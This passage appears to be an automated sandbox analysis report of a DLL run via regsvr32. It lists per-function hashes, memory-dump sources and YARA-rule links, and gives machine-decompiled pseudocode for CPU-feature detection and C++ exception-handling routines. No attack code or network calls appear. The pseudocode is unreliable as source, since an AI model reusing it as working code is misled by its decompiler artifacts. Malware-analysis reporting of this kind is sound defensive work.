                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                            • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E90F8 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                            • Instruction ID: c836f3e58c16706dd3c80b20d06e017b6bbce156b8b04ce9cc750eb898ec9928
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE51B2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81696250D7B4D6A5CFC0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EB83C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                            • Instruction ID: e4eaa8bc43b45f4b5d8b63ef1d02a21468cbb00578103819409851d9b0bad903
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F45128719047498BDF48CF68C8895DEBBF1FB48318F11835CE88AA72A0D7B89A44CF45
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F5CC4 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                            • Instruction ID: 062d643264739ab1e891a94cba31190f9edc2e5fafa36bbc930a99bd3432fa84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D51A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619E865A6250D3B8D664CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02905450 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                            • Instruction ID: b92c993013505d333f54714688ca06d341c04675f8e13dc3dd7c5227dab0f639
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51AEB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19EC25A6250D3B8D665CF91
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FCC84 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                            • Instruction ID: d773df06b56020ae56cb85f4e5a2bd26087ae3abbd8f963620cd7788ad609e84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC41C2B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EFFB8 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                            • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F8E08 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                            • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F4F18 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                            • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F15C8 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                            • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800070A0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                            			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}







                                                                                                                                                                                                            0x1800070a0
                                                                                                                                                                                                            0x1800070a6
                                                                                                                                                                                                            0x1800070ab
                                                                                                                                                                                                            0x1800070b2
                                                                                                                                                                                                            0x1800070b2
                                                                                                                                                                                                            0x1800070b9
                                                                                                                                                                                                            0x1800070bb
                                                                                                                                                                                                            0x1800070c3
                                                                                                                                                                                                            0x1800070c9
                                                                                                                                                                                                            0x1800070cd
                                                                                                                                                                                                            0x1800070d3
                                                                                                                                                                                                            0x1800070d7
                                                                                                                                                                                                            0x1800070e1
                                                                                                                                                                                                            0x1800070eb
                                                                                                                                                                                                            0x1800070f6
                                                                                                                                                                                                            0x1800070fa
                                                                                                                                                                                                            0x180007101
                                                                                                                                                                                                            0x18000710f

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                            • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: GestureInfo$CloseHandle
                                                                                                                                                                                                            • String ID: 8
                                                                                                                                                                                                            • API String ID: 372500805-4194326291
                                                                                                                                                                                                            • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                            • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                                                                                                            • String ID: i
                                                                                                                                                                                                            • API String ID: 3181456275-3865851505
                                                                                                                                                                                                            • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                                                                                                                            • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1917832262-0
                                                                                                                                                                                                            • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                                                                                                                            • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                            			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0xc23e8d4af72c
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
